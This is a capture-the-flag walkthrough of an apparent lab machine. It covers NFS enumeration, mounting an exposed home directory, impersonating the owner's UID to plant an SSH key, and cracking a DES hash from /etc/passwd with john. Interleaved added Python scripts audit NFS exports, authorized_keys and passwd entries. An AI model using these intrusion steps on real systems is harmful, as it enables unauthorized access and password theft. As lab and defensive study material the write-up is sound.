1. Net Discovery
nmap -sn

My target is

2. Port scan

nmap -Pn -p1000-

There are seven open ports: 22, 111, 2049, 35049, 38329, 57299, and 59475.

3. OS and service scan

nmap -A -p22,111,2049,35049,38329,57299,59475

There’s an NFS service.

4. Vuln scan

nmap --script vuln -p22,111,2049,35049,38329,57299,59475

Nothing useful.

5. NFS scan

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount

There’s a misconfiguration. I can mount ‘/home/peter’ on my machine.

6. Mounting /home/peter

mkdir mnt
ls
mount mnt
cd mnt
ls -la
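The misconfiguration exploited in steps 5 and 6 is an NFS export that any client can mount, with the server trusting whatever UID the client presents. An /etc/exports audit that flags exactly those conditions is the defender's counterpart to the nfs-showmount scan. The script below is an added example, not part of the original writeup; its rules are my own choices and the export lines it checks are constructed, not the challenge machine's configuration.

```python
"""Audit /etc/exports-style lines for export settings that let an arbitrary
client mount a home directory and act as its owner.

Added example, not from the original writeup. Flagging rules are the example
author's assumptions; the sample export lines are constructed.
"""
import re
from typing import Dict, List

# Constructed sample of /etc/exports content (not a real host's config).
SAMPLE_EXPORTS = """\
# constructed sample
/home/peter *(rw,sync,no_root_squash)
/srv/data 10.0.0.0/24(ro,sync,root_squash,sec=krb5p)
/export/pub *(ro,all_squash,anonuid=65534,anongid=65534)
/home 192.168.1.0/24(rw,insecure)
"""

ENTRY_RE = re.compile(r"^(\S+)\s+(.*)$")
# Either "host(opt,opt)" or a bare host with no option list.
CLIENT_RE = re.compile(r"(\S+?)\(([^)]*)\)|(\S+)")


def parse_exports(text: str) -> List[Dict]:
    """Split each export line into one record per (path, client host, options)."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        path, rest = m.group(1), m.group(2)
        for cm in CLIENT_RE.finditer(rest):
            if cm.group(1) is not None:
                host, opts = cm.group(1), cm.group(2)
            else:
                host, opts = cm.group(3), ""
            options = [o.strip() for o in opts.split(",") if o.strip()]
            entries.append({"path": path, "host": host, "options": options})
    return entries


def audit_entry(entry: Dict) -> List[str]:
    """Return human-readable findings for one export record."""
    findings = []
    opts = set(entry["options"])
    if entry["host"] == "*" or entry["host"].startswith("*."):
        findings.append("exported to any client host")
    if "no_root_squash" in opts:
        findings.append("no_root_squash: client root is trusted as root on the server")
    if "insecure" in opts:
        findings.append("insecure: mounts from unprivileged source ports are accepted")
    # With the default sec=sys the server believes the UID/GID the client sends;
    # only Kerberos security flavours or all_squash remove that trust.
    strong_sec = any(o.startswith("sec=") and o != "sec=sys" for o in opts)
    if not strong_sec and "all_squash" not in opts:
        findings.append("sec=sys (default): server trusts client-supplied UID/GID")
    is_home = entry["path"] == "/home" or entry["path"].startswith("/home/")
    if is_home and "rw" in opts:
        findings.append("writable home export: a client presenting the owner's UID can modify ~/.ssh")
    return findings


def audit_exports(text: str) -> Dict[str, List[str]]:
    """Map 'path -> host' to its findings, omitting clean entries."""
    report: Dict[str, List[str]] = {}
    for entry in parse_exports(text):
        key = f"{entry['path']} -> {entry['host']}"
        findings = audit_entry(entry)
        if findings:
            report[key] = findings
    return report


if __name__ == "__main__":
    for key, findings in audit_exports(SAMPLE_EXPORTS).items():
        print(key)
        for finding in findings:
            print("   -", finding)
```

Run it against a real /etc/exports by passing the file contents to audit_exports; an export that produces no findings is one a client cannot mount anonymously and cannot use to impersonate a local UID.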

7. Add public key for SSH login

Check the owner of the mounted directory

stat .

The username is peter, UID is 1001 and GID is 1005.

Add a local user with the same UID and GID

groupadd -g 1005 peter
adduser --uid 1001 --gid 1005 peter

Change user to peter

su peter

Create an SSH key pair

ssh-keygen -t rsa

Copy public key to the mounted directory

mkdir .ssh
cp /home/peter/.ssh/ .ssh/authorized_keys
cd .ssh
ls -la

Log in as peter via SSH with the private key

ssh -i /home/peter/.ssh/id_rsa peter@
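Step 7 ends with a new public key sitting in peter's authorized_keys, written by a client that merely matched the UID. On the defending side, the reliable way to notice that is a baseline of approved key fingerprints per account, plus a permission check on ~/.ssh. The script below is an added example, not part of the original writeup: it builds a throwaway home directory with one approved key and one unapproved key (both blobs and the baseline are constructed) and reports the unknown key and the loose file mode.

```python
"""Compare ~/.ssh/authorized_keys against a baseline of approved fingerprints
and check ~/.ssh permissions.

Added example, not from the original writeup. The home directory, key blobs
and baseline below are constructed for the demonstration.
"""
import base64
import hashlib
import os
import stat
import tempfile
from typing import Dict, List, Tuple

# Constructed key blobs: valid base64, not real public keys.
KNOWN_BLOB = base64.b64encode(b"constructed blob for the legitimate key").decode()
PLANTED_BLOB = base64.b64encode(b"constructed blob for a key nobody approved").decode()


def fingerprint(b64_blob: str) -> str:
    """OpenSSH-style fingerprint: SHA256 of the decoded blob, base64 without padding."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


# Approved fingerprints per account (constructed baseline).
BASELINE: Dict[str, str] = {fingerprint(KNOWN_BLOB): "peter@laptop"}


def parse_authorized_keys(text: str) -> List[Tuple[str, str, str]]:
    """Return (key type, fingerprint, comment) for each key line."""
    keys = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # An options field may precede the key type; locate the type field.
        idx = next((i for i, f in enumerate(fields)
                    if f.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(fields):
            continue
        ktype, blob = fields[idx], fields[idx + 1]
        comment = " ".join(fields[idx + 2:])
        keys.append((ktype, fingerprint(blob), comment))
    return keys


def audit_home(home: str, baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Report keys missing from the baseline and modes looser than sshd expects."""
    findings: Dict[str, List[str]] = {"unknown_keys": [], "permissions": []}
    ssh_dir = os.path.join(home, ".ssh")
    ak = os.path.join(ssh_dir, "authorized_keys")
    if not os.path.exists(ak):
        return findings
    for path, allowed in ((ssh_dir, 0o700), (ak, 0o600)):
        mode = stat.S_IMODE(os.stat(path).st_mode)
        if mode & ~allowed:   # any bit set beyond the allowed mode
            findings["permissions"].append(
                f"{path} mode {oct(mode)} looser than {oct(allowed)}")
    with open(ak) as fh:
        for ktype, fp, comment in parse_authorized_keys(fh.read()):
            if fp not in baseline:
                findings["unknown_keys"].append(
                    f"{ktype} {fp} ({comment or 'no comment'})")
    return findings


def build_demo_home() -> str:
    """Construct a temporary home with one approved and one unapproved key."""
    home = tempfile.mkdtemp(prefix="authkeys-audit-")
    ssh_dir = os.path.join(home, ".ssh")
    os.mkdir(ssh_dir, 0o700)
    ak = os.path.join(ssh_dir, "authorized_keys")
    with open(ak, "w") as fh:
        fh.write(f"ssh-ed25519 {KNOWN_BLOB} peter@laptop\n")
        fh.write(f"ssh-rsa {PLANTED_BLOB} unknown@unknown-host\n")
    os.chmod(ak, 0o644)   # constructed: looser than the expected 0600
    return home


if __name__ == "__main__":
    result = audit_home(build_demo_home(), BASELINE)
    for category, items in result.items():
        print(category)
        for item in items:
            print("   -", item)
```

In production the baseline would come from a configuration store and audit_home would be run over every real home directory; a key that is not in the baseline is the signal to investigate, regardless of how it got there.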

9. Privilege Escalation

Read /etc/passwd

cat /etc/passwd

There’s a password hash for the user ‘insecurity’ stored directly in /etc/passwd.

Copy the hash to hash.txt

echo AzER3pBZh6WZE > hash.txt
cat hash.txt

Crack it with john

john --wordlist=/root/Desktop/rockyou.txt hash.txt
john hash.txt --show

I got the password.

NOTE: I already solved this challenge, so my screenshot shows the hash as already cracked.

Change user to ‘insecurity’

su insecurity
whoami
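The privilege escalation in step 9 works only because a hash is sitting in the world-readable /etc/passwd instead of /etc/shadow, and a 13-character traditional DES crypt value at that, which rockyou-style dictionaries go through quickly. A host audit should catch that before anyone else does. The script below is an added example, not part of the original writeup: it parses /etc/passwd-format lines, flags every account whose password field holds something other than the shadow marker or a lock marker, and names the hash family. The sample lines are constructed, not the challenge machine's passwd file.

```python
"""Flag /etc/passwd entries that carry a password hash (or no password) in the
second field instead of the 'x' that points to /etc/shadow.

Added example, not from the original writeup. Sample lines are constructed.
"""
import re
from typing import Dict, Optional

# Constructed /etc/passwd sample.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
peter:x:1001:1005:Peter:/home/peter:/bin/bash
insecurity:AbCdEfGhIjKlM:1002:1002::/home/insecurity:/bin/bash
legacy:$1$saltsalt$qwertyuiopasdfghjklzxc:1003:1003::/home/legacy:/bin/sh
svc:!:1004:1004::/var/lib/svc:/usr/sbin/nologin
"""

# crypt(3) prefixes and the families they denote.
HASH_PREFIXES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$7$": "scrypt",
    "$y$": "yescrypt",
}
# Traditional DES crypt: 13 characters from the crypt alphabet, no prefix.
DES_RE = re.compile(r"^[./0-9A-Za-z]{13}$")


def classify(field: str) -> Optional[str]:
    """Return a description of the password field if it is a finding, else None.

    'x' means the hash lives in /etc/shadow; '*', '!' and '!!' mean the account
    is locked with no hash. Anything else is either an empty password or a hash
    exposed to every local user.
    """
    if field == "":
        return "empty (no password required)"
    if field in ("x", "*", "!", "!!"):
        return None
    locked = field.startswith("!")          # '!' in front of a hash: locked, but the hash still leaks
    core = field.lstrip("!")
    family = None
    for prefix, name in HASH_PREFIXES.items():
        if core.startswith(prefix):
            family = name
            break
    if family is None and DES_RE.match(core):
        family = "traditional DES crypt (weak, 8-character password limit)"
    if family is None:
        family = "unrecognised hash-like value"
    return ("locked " if locked else "") + family


def audit_passwd(text: str) -> Dict[str, str]:
    """Map each offending username to the classification of its password field."""
    report: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            report[line] = "malformed entry (expected 7 fields)"
            continue
        user, pw_field = fields[0], fields[1]
        verdict = classify(pw_field)
        if verdict is not None:
            report[user] = verdict
    return report


if __name__ == "__main__":
    for user, verdict in audit_passwd(SAMPLE_PASSWD).items():
        print(f"{user}: {verdict}")
```

Feeding the script the real /etc/passwd (readable by any user, which is the point) gives the list of accounts whose credentials should be moved into /etc/shadow with pwconv and rotated, since the exposed hash must be assumed cracked.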